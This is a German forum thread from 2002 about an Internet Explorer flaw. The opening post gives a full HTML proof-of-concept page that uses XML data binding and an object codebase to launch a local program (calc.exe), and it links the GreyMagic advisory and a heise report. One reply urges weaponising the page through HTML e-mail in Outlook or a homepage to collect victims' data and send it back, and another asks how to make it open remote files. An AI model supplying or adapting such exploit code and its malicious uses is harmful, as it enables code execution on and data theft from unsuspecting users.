Per IE jedes Programm Starten!!!

Kennt Ihr das schon??? Jedes beliebige Programm ausführen per IE x!?

<html>
<head>
<title>Running "c:/winnt/system32/calc.exe"..</title>
<link rel="stylesheet" href="../sec.css">
</head>
<body>
Running "c:/winnt/system32/calc.exe"..
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
</body>
</html>

http://security.greymagic.com/adv/gm001-ie/
http://www.heise.de/newsticker/data/pab-04.03.02-001/
[Diese Nachricht wurde von Azubi am 08.03.2002 | 12:55 geändert.]

 

Da kommen wir der Sache schon näher: ein Exploit von jemand, der offensichtlich wirklich was davon versteht, und nix anderes. Trotzdem hats bei mir nicht gefunzt, und die Links wären schon bei deinem ersten Posting fällig gewesen.

Gruß
frederic

 

s den ja nicht.

Und spätestens bei C:\ gibt\'s einen Fehler.
\ gibt es in Unix-Pfaden nicht. Nur als Zeichen, wenn man an der konsole eine Leerzeile im Dateinamen kenntlich machen muss :-)

Unix ist die totale Einheitlichkeit

file://pfad
http://
htttps://
ftp://

Wie weit aber Java-Script irgendetwas Ausführen kann in den diversen Browsers, wenn man die Pfade anpasst, wüsste ich gern mal.

Ich hoffe ja,dass ohne manuelles Eingreifen nichts passieren kann.

MfG

Schugy

 

Hier die Links zu Thema:
http://security.greymagic.com/adv/gm001-ie/
http://www.heise.de/newsticker/data/pab-04.03.02-001/

 

Daß man damit unter gewissen Voraussetzungen jedes Programm starten kann, bezweifle ich nicht.

Allerdings hab ich das Programm, wie schon angedeutet, als Quelltext im CT-Browsercheck gefunden. Als Testprogramm für Sicherheitslücken ist es offensichtlich auch konzipiert; die Bezeichnung *exploit* für den wesentlichen Funktionsteil zeigt das mehr als deutlich. Der von dir benannte Link ist nur die Startseite bei Heise und damit als Fundstelle ohne Aussagekraft.

Interessant ists allemal. Da der Exploit aber nicht auf deinem Mist gewachsen ist, wärs geboten gewesen (und für die Leser hier auch sinnvoll), daß du die Quelle genannt hättest.

Übrigens, zur allgemeinen Beruhigung: ein IE6 mit aktuellen Patches läßt das Starten nicht zu. Die Sicherheitslücke ist also behoben. Möge sich jeder Leser also sein eigenes Urteil bilden.

Gruß
frederic

 

Praktische Funktion:
Eine HTML eMail mit entsprechende Code in z.B. Outlook einbinden.
Die Daten, die man haben möchte in eine .txt schreiben lassen und zurück schicken.
Seid mal kreativ *g* z.B. eine HP bauen die den Code enthält......

 

Hi, als erstes muss ich mal sagen das ich auf diese "Funktion" gestossen bin bei http://www.heise.de
Ich dachte mir mal ich Poste diesen Artikel in die PC-Welt, da ich diesen Artikel hier noch nicht endecken konnte und da es sich um ein grosses Problem handelt. Die "Lücke" ist seid ca. einem Jahr bekannt!!!
Es funktioniert bei jedem IE Browser, ganz egal ob ob JavaScribt oder Active X an oder aus ist!!!
Man kann damit JEDES Programm Starten!!! Man muss nur den absoluten Pfad angeben.Die entsprechende ID muss NICHT verändert werden! Ich würde sagen das es keine "Lücke" ist da man in XML Programme über den Code Local starten kann!
Oder was meint Ihr Dazu?
MFG Christopher

 

Daß du das aus dem CT-Browsercheck abgekupfert hast, find ich weniger klasse.

Gruß
frederic

 

Find ich klasse.

3 Fragen dazu:

- Ist das eine Sicherheitslücke oder eine mögliche Funktion des IE?
- Gibt es die Möglichkeit das Ganze auf Basis der Registry auszuführen (sprich das er sich den Ordner zum Programm selber sucht)?
- Wie übergebe ich eine Datei zum öffnen mit dem entsprechenden Programm (Datei online - nicht lokal)?

Gruss, Matthias

 

ich versteh gar nix... ;(